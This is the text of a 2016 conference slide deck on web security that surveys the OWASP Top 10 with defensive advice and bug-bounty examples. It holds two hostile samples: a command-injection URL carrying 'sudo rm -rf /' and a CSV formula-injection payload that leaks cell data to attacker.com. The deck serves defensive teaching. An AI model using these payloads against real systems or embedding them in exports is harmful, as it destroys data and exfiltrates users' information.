Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Let's talk Security

Let's talk Security

Slides from Engineering Talkies at Wingify

Dheeraj Joshi

April 21, 2016

More Decks by Dheeraj Joshi

Other Decks in Technology


  1. About Me I find security vulnerabilities for fun & swag

    and I wear White Hat. Uber, CKEditor, Dropbox, MailChimp, InVision, DigitalOcean, CloudFare, Intuit, Groupon, etc. What makes me happy?
  2. Security - Into The Details • Owasp’s Top 10 Vulnerabilities

    ◦ Explain ◦ Impact ◦ Defense ◦ Real examples (External + Internal) • Demo - RCE • Q & A
  3. Why should Startups Care about Security? Startups & SMEs are

    impromptu for cutting corners. One of the first things they cut is ‘Security'.
  4. PREVENT INJECTION • For databases use prepared statements • Whitelist

    inputs wherever possible • Sanitize inputs (use filter extension) • Don’t trust user input and always verify!
  5. Example Google Command Injection We can include any command in

    the URL below https://console.cloud.google.com/home/dashboard? project=;sudo rm -rf / Found by an Indian Security Researcher (S. Venkatesh)
  6. Exploiting ‘Export as CSV’ functionality Formula Injection =HYPERLINK("http://attacker.com?leak="&A1&A2,"Error: please click

    for further information") Fix - Append a single quote (‘) to the list of formula triggers ( =, +, -) If victim clicks this cell, they will inadvertently exfiltrate the contents of cells A1 and A2 to attacker website, which may include other users’ sensitive information.
  7. MITIGATION • Enforce strong password policy • Require periodic reset

    of password • Use 2 factor authentication • Use SSL and secure flag on cookies • Don’t neglect failed-login detection & tracking • Only use httpOnly cookies
  8. CROSS SITE SCRIPTING - XSS • XSS attack users •

    “Javascript Injection” • Exploits can be bad, really bad..
  9. Protect Yourself • Use filter extension to filter inputs •

    Ensure that outputs are HTML encoded • Don’t reinvent the wheel • Don’t consider any part of the request as being “safe”
  10. ngBind attribute $sanitize - service in module ngSanitize Sanitizes an

    html string by stripping all potentially dangerous tokens.
  11. Scenario / Exploit 1) First, an attacker signup for an

    account and request ”forgot password”. 2) You will receive a link : https://vimeo.com/forgot_password/[user id]/[token]
  12. Prevention • Low level access controls • Prevent user input

    in file/URL access commands • No unsanitized input to execution commands
  13. PREVENTION > CURE • Perform periodic security checks using automated

    tools • Static Code Analysis • Example : Hardening MySQL, Directory Listing, Auth Tokens
  14. SENSITIVE DATA EXPOSURE • Exposed PHP error messages • Unencrypted

    sensitive data storage • Not using SSL • Example: a sensitive token should not be sent to external websites (Fitbit)
  15. MISSING FUNCTION LEVEL ACCESS CONTROL • Valid input processing without

    access controls • Decentralized access control layer • Example : Profile email address not validated (Github), S3 configuration
  16. • Don’t perform data changes on GET • Use secure

    (csrf) tokens for POST • Impact : Real bad, attack users • Example : Dropbox, CodeSchool CROSS-SITE REQUEST FORGERY (CSRF)
  17. • Not keeping libraries up-to-date • *cough*Wordpress*cough* • Example :

    Third-Party Libraries (Apache CXF Authentication Bypass, Spring RCE) USING COMPONENTS WITH KNOWN VULNERABILITIES
  18. UNVALIDATED REDIRECTS AND FORWARDS • Header Injection • JavaScript Parameter

    Injection • Reliance on HTTP_REFERER • Abuse window opener (Facebook)
  19. The solution • Reset all passwords and keys • Remove

    backdoors (not easy) OR Destroy everything??